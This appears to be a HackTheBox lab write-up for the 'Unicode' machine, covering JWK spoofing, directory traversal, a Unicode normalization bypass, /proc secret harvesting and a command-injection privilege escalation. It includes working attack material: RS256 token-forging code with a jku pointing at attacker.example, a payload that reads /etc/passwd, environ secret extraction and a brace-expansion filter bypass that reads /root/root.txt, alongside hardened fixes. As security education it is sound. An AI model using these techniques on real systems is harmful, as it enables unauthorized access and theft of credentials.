JWK Spoofing, Directory traversal, Unicode normalization, Use /proc to gather info…
Many elements. Much fun.
It took me two days to find the flags.
I used dirb for the first time. It comes pre-installed with Kali Linux. I used it because somehow gobuster kept returning an error.
dirb http://10.10.11.126
gobuster dir --url http://10.10.11.126 --wordlist /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
01:08 JWT token found
A JWT starts with ey (the base64url encoding of {") and has three dot-separated parts: header, payload and signature.
![](https://nekocyber.com/wp-content/uploads/cocoon-resources/blog-card-cache/f068ccee44718e2c7a937cd84b8adc67.png)
https://github.com/ticarpi/jwt_tool is also available.
03:51 Prepare json file with new key
ssh-keygen -f unicode.key
openssl rsa -text -noout -in unicode.key -modulus
Note: recent ssh-keygen versions write an OpenSSH-format private key (BEGIN OPENSSH PRIVATE KEY) that openssl rsa cannot read; add -m PEM to the ssh-keygen call, or generate the key with openssl genrsa instead. Neither command needs sudo.
xxd makes a hexdump or does the reverse:
-r reverse operation: convert (or patch) a hexdump into binary.
-p output in postscript continuous hexdump style, also known as plain hexdump style.
Hexdump to binary, then base64, in one line:
echo -n **** | xxd -r -p | base64 -w 0
**** is the modulus hex of the RSA public key (the part after Modulus= in the openssl output). Two caveats before pasting the result into the JSON: base64 -w 0 emits standard base64 (+, / and trailing = padding), while the JWK n and e fields are base64url without padding, so translate + to -, / to _ and drop any =. Also, the -text listing prefixes the modulus with a 00 byte (to mark it as non-negative); RFC 7518 wants the minimum number of octets, so leave that 00 out, although most JWT libraries tolerate it.
json file here
{
"keys": [
{
"kty": "RSA",
"use": "sig",
"kid": "hackthebox",
"alg": "RS256",
"n": "AMVcGPF62MA_lnClN4Z6WNCXZHbPYr-dhkiuE2kBaEPYYclRFDa24a-AqVY5RR2NisEP25wdHqHmGhm3Tde2xFKFzizVTxxTOy0OtoH09SGuyl_uFZI0vQMLXJtHZuy_YRWhxTSzp3bTeFZBHC3bju-UxiJZNPQq3PMMC8oTKQs5o-bjnYGi3tmTgzJrTbFkQJKltWC8XIhc5MAWUGcoI4q9DUnPj_qzsDjMBGoW1N5QtnU91jurva9SJcN0jb7aYo2vlP1JTurNBtwBMBU99CyXZ5iRJLExxgUNsDBF_DswJoOxs7CAVC5FjIqhb1tRTy3afMWsmGqw8HiUA2WFYcs",
"e": "AQAB"
}
]
}
| Field | Meaning |
| --- | --- |
| n | The modulus of the RSA public key, Base64urlUInt-encoded |
| e | The exponent of the RSA public key, Base64urlUInt-encoded |
e is almost always 65537, which encodes as AQAB.
Why "65537 = AQAB"?
65537 = 0x010001, i.e. three bytes: 00000001 00000000 00000001.
Regroup those 24 bits into 6-bit base64 digits:
000000 010000 000000 000001
That is 0, 16, 0, 1 = A Q A B (three bytes map to exactly four characters, so there is no padding to strip).
So in this box we do not need to touch e: the freshly generated key reports "publicExponent: 65537 (0x10001)", which is the AQAB already in the JSON file.
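The whole JWK-spoofing chain above (turn the openssl modulus into a JWK, encode e as AQAB, sign a token with the matching private key, and see why a server that trusts only its own key set rejects it) as an added example in Python. This is not the box's code and not jwt_tool; it is standard-library only, so the RSA key comes from a short Miller-Rabin routine (demo grade; use openssl or ssh-keygen for real work) and RS256 is PKCS#1 v1.5 over SHA-256 done with pow(). The kid, the jku URL (http://attacker.example/jwks.json) and the claims are placeholders, and the jku header is assumed to be how the server is pointed at the spoofed key set; the page does not show that detail.

```python
"""Spoofed JWK Set and RS256 token forging, standard library only. Added
example for this writeup, not the box's code or jwt_tool's. Key generation
is a short Miller-Rabin (demo grade; use openssl/ssh-keygen for real work).
The kid, jku URL and claims are placeholders (assumptions)."""
import base64, hashlib, json, math, secrets, string

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

def b64url_uint(value: int) -> str:
    """RFC 7518 Base64urlUInt: big-endian, minimum octets, no '=' padding.
    65537 = 0x010001 -> 01 00 01 -> 000000 010000 000000 000001 -> 'AQAB'."""
    return b64url(value.to_bytes(max(1, (value.bit_length() + 7) // 8), "big"))

def make_jwk(n: int, e: int, kid: str) -> dict:
    return {"kty": "RSA", "use": "sig", "kid": kid, "alg": "RS256",
            "n": b64url_uint(n), "e": b64url_uint(e)}

def jwk_from_openssl_modulus(text: str, kid: str, e: int = 65537) -> dict:
    """Takes 'Modulus=C55C...' from `openssl rsa -modulus` or the colon-separated
    '00:c5:5c:...' lines from -text; int() drops the leading zero octet that
    -text prints and that Base64urlUInt forbids."""
    digits = "".join(c for c in text.split("=")[-1] if c in string.hexdigits)
    return make_jwk(int(digits, 16), e, kid)

def _probable_prime(n: int, rounds: int = 16) -> bool:
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(secrets.randbelow(n - 3) + 2, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True

def _random_prime(bits: int) -> int:
    while True:
        cand = secrets.randbits(bits) | (1 << (bits - 1)) | 1
        if _probable_prime(cand):
            return cand

def generate_rsa(bits: int = 1024, e: int = 65537):
    """Returns (n, e, d); 1024 bits keeps the demo quick."""
    while True:
        p, q = _random_prime(bits // 2), _random_prime(bits // 2)
        phi = (p - 1) * (q - 1)
        if p != q and math.gcd(e, phi) == 1:
            return p * q, e, pow(e, -1, phi)

_SHA256_DI = bytes.fromhex("3031300d060960864801650304020105000420")  # RFC 8017 9.2

def _emsa_pkcs1_v15(msg: bytes, k: int) -> bytes:
    t = _SHA256_DI + hashlib.sha256(msg).digest()
    return b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t

def rs256_sign(msg: bytes, n: int, d: int) -> bytes:
    k = (n.bit_length() + 7) // 8
    return pow(int.from_bytes(_emsa_pkcs1_v15(msg, k), "big"), d, n).to_bytes(k, "big")

def rs256_verify(msg: bytes, sig: bytes, n: int, e: int) -> bool:
    k = (n.bit_length() + 7) // 8
    return len(sig) == k and pow(int.from_bytes(sig, "big"), e, n).to_bytes(k, "big") == _emsa_pkcs1_v15(msg, k)

def forge_jwt(claims: dict, n: int, d: int, kid: str, jku: str) -> str:
    """Header names our kid and a jku pointing at the JWK Set we host (assumption)."""
    enc = lambda obj: b64url(json.dumps(obj, separators=(",", ":")).encode())
    signing_input = enc({"alg": "RS256", "typ": "JWT", "kid": kid, "jku": jku}) + "." + enc(claims)
    return signing_input + "." + b64url(rs256_sign(signing_input.encode(), n, d))

def verify_jwt(token: str, jwks: dict):
    """Server side done right: key chosen by kid from a JWK Set it already trusts.
    Fetching that set from the token's own jku instead is the spoofing hole."""
    h, p, s = token.split(".")
    header = json.loads(b64url_decode(h))
    key = next((k for k in jwks["keys"] if k.get("kid") == header.get("kid")), None)
    if key is None or header.get("alg") != "RS256" or key.get("kty") != "RSA":
        return None
    n, e = (int.from_bytes(b64url_decode(key[f]), "big") for f in ("n", "e"))
    return json.loads(b64url_decode(p)) if rs256_verify(f"{h}.{p}".encode(), b64url_decode(s), n, e) else None

def demo():
    """Forge with a fresh key: verifies against our JWKS, fails against one
    holding a different key under the same kid."""
    n, e, d = generate_rsa()
    token = forge_jwt({"user": "admin"}, n, d, "hackthebox", "http://attacker.example/jwks.json")
    n2, e2, _ = generate_rsa()
    ours = {"keys": [make_jwk(n, e, "hackthebox")]}
    theirs = {"keys": [make_jwk(n2, e2, "hackthebox")]}
    return verify_jwt(token, ours), verify_jwt(token, theirs)
```

jwk_from_openssl_modulus accepts either form openssl prints, and b64url_uint(65537) returns the AQAB from the explanation above; json.dumps(demo-built JWKS) is what you would host for the server to fetch.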
05:21 Directory traversal vulnerability
/../../../../../../../etc/passwd
05:35 Unicode issue
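The traversal and the Unicode issue belong together: a filter that looks for ".." in the raw input and only afterwards normalizes the string lets characters that NFKC folds into "../" through. Added example in Python, not the box's code; the filter, the temporary directory layout and the probe string are assumptions, while the NFKC mappings (U+2025 TWO DOT LEADER to "..", U+FF0F FULLWIDTH SOLIDUS to "/") are real.

```python
"""Traversal past a '..' filter using characters that NFKC folds to '../'.
Added example for the traversal and Unicode sections of this writeup; not
the box's code. Filter, directory layout and probe string are assumptions."""
import os
import tempfile
import unicodedata

PROBE = "\u2025\uff0fsecret.txt"   # no literal '.' or '/' in it

def vulnerable_resolve(base: str, user_path: str):
    """Check first, normalise second: the order that loses."""
    if ".." in user_path:
        return None                      # PROBE sails through here
    folded = unicodedata.normalize("NFKC", user_path)
    return os.path.normpath(os.path.join(base, folded))

def hardened_resolve(base: str, user_path: str):
    """Normalise, resolve to a real path, then require it to stay under base.
    Also catches an absolute payload like /../../etc/passwd, which os.path.join
    would otherwise let replace the base directory."""
    folded = unicodedata.normalize("NFKC", user_path)
    base_real = os.path.realpath(base)
    target = os.path.realpath(os.path.join(base_real, folded))
    if os.path.commonpath([base_real, target]) != base_real:
        return None
    return target

def demo() -> dict:
    """Constructed tree: <root>/public is the served dir, <root>/secret.txt
    sits one level above it."""
    with tempfile.TemporaryDirectory() as root:
        public = os.path.join(root, "public")
        os.mkdir(public)
        with open(os.path.join(root, "secret.txt"), "w") as f:
            f.write("TOP SECRET")
        out = {"probe_folds_to": unicodedata.normalize("NFKC", PROBE)}
        p = vulnerable_resolve(public, PROBE)
        out["vulnerable_read"] = open(p).read() if p and os.path.isfile(p) else None
        out["hardened"] = hardened_resolve(public, PROBE)
        out["plain_traversal_blocked"] = vulnerable_resolve(public, "../secret.txt") is None
        return out
```

The fix is not a longer blocklist: normalize (or otherwise canonicalize) first, resolve the path, then check containment.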
05:46 /proc investigation
/proc exposes a lot about the server and its processes; with a file-read primitive, /proc/self/ describes the very process serving your request.
/proc/self/
cmdline — The command line the process was started with, as NUL-separated arguments.
cwd — A symbolic link to the current working directory of the process.
environ — The process's environment as NUL-separated KEY=value pairs, so it shows up as one run-together line in a browser or with cat; split on \0 to read it. Database passwords and signing secrets often live here.
exe — A symbolic link to the executable of this process.
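Both cmdline and environ are NUL-separated, which is why they look like one long line when pulled through a file-read bug. An added Python example (not the box's code) that parses that format, flags the variables worth a second look, and reads the live /proc/self entries when run on Linux; the sample bytes are constructed and the secret-hinting names are an assumption.

```python
"""Reading /proc/self through a file-read bug: cmdline and environ are
NUL-separated. Added example, not the box's code; sample bytes constructed."""
import os

SAMPLE_CMDLINE = b"/usr/bin/node\x00/home/code/app.js\x00"                        # constructed
SAMPLE_ENVIRON = b"PATH=/usr/bin\x00HOME=/home/code\x00JWT_SECRET=hunter2\x00"    # constructed
SECRET_HINTS = ("SECRET", "KEY", "TOKEN", "PASS", "DB_")                           # assumption

def parse_nul_list(raw: bytes) -> list:
    """Split a NUL-terminated list as found in /proc/<pid>/cmdline and environ."""
    return [s.decode("utf-8", "replace") for s in raw.split(b"\x00") if s]

def parse_environ(raw: bytes) -> dict:
    env = {}
    for item in parse_nul_list(raw):
        key, _, value = item.partition("=")
        env[key] = value
    return env

def likely_secrets(env: dict) -> dict:
    """Variables worth a second look once environ has been pulled."""
    return {k: v for k, v in env.items() if any(h in k.upper() for h in SECRET_HINTS)}

def inspect_self() -> dict:
    """Live read of the four entries listed above, on Linux; {} elsewhere."""
    info = {}
    try:
        with open("/proc/self/cmdline", "rb") as f:
            info["cmdline"] = parse_nul_list(f.read())
        info["cwd"] = os.readlink("/proc/self/cwd")
        info["exe"] = os.readlink("/proc/self/exe")
        with open("/proc/self/environ", "rb") as f:
            info["environ"] = parse_environ(f.read())
    except OSError:
        pass
    return info
```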
06:29 Privilege escalation
file: names a file on the local file system. The path portion of a file: URL consists of three parts:
a double slash (//)
the name of the system on which the file system is located, followed by a path separator character
root flag is usually at /root/root.txt
Both of these return an "Invalid url" error:
file:/root/root.txt
file:///root/root.txt
The literal string "file" is probably what the validator matches on, so a backslash was inserted somewhere inside "file".
That worked: the backslash defeats the string match, and the shell that runs the command strips it (quote removal) before the URL reaches the tool.
However, there was no indication of where the downloaded file ended up.
fi\le:/root/root.txt
f\ile:/root/root.txt
Now we need to specify where to download to.
A space, however, was rejected, as in:
f\ile:/root/root.txt -o /tmp/root.txt
So wrap everything in {}. Bash brace expansion then splits the comma-separated list into separate words, so each , does the job of a space:
{f\ile:/root/root.txt,-o,/tmp/root.txt}
Example:
echo {this,is,love}
this is love
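Both tricks in this section (the backslash inside "file" and the comma-separated braces) only work because the value is spliced into a shell command line unquoted, where quote removal and brace expansion run on it. An added Python example, not the box's binary: naive_url_check is an assumed stand-in for its validator, printf stands in for the tool so each word it would receive is visible, and the hardened variants show the two fixes (parse the scheme instead of string-matching, and pass the value as its own argument instead of through a shell). bash must be installed for the two subprocess functions.

```python
"""Why 'f\\ile:' and '{...,-o,...}' get past a URL check: the value reaches a
shell unquoted. Added example for the privesc section; the check and the
printf stand-in for the real tool are assumptions."""
import shutil
import subprocess
from urllib.parse import urlparse

BYPASS = r"{f\ile:/root/root.txt,-o,/tmp/root.txt}"

def naive_url_check(url: str) -> bool:
    """Assumed filter: a literal 'file:' prefix and spaces are rejected."""
    return not url.startswith("file:") and " " not in url

def scheme_allowlist_check(url: str) -> bool:
    """Better check: parse, then allow only the schemes the tool should reach."""
    return urlparse(url).scheme in ("http", "https")

def has_bash() -> bool:
    return shutil.which("bash") is not None

def words_seen_by_tool_unquoted(url: str) -> list:
    """Vulnerable: string pasted into a bash command line. Brace expansion turns
    one word into three and quote removal deletes the backslash."""
    cmd = "printf '%s\\n' " + url
    out = subprocess.run(["bash", "-c", cmd], capture_output=True, text=True, check=True).stdout
    return out.splitlines()

def words_seen_by_tool_quoted(url: str) -> list:
    """Hardened: the value is its own argv element and is expanded as "$1",
    so the shell performs no word splitting or expansion on it."""
    out = subprocess.run(["bash", "-c", "printf '%s\\n' \"$1\"", "_", url],
                         capture_output=True, text=True, check=True).stdout
    return out.splitlines()
```

With BYPASS, the unquoted variant hands the tool three words, file:/root/root.txt, -o and /tmp/root.txt, exactly the echo {this,is,love} effect above; the quoted variant hands it the braces and backslash literally, and the scheme check rejects it before any command runs.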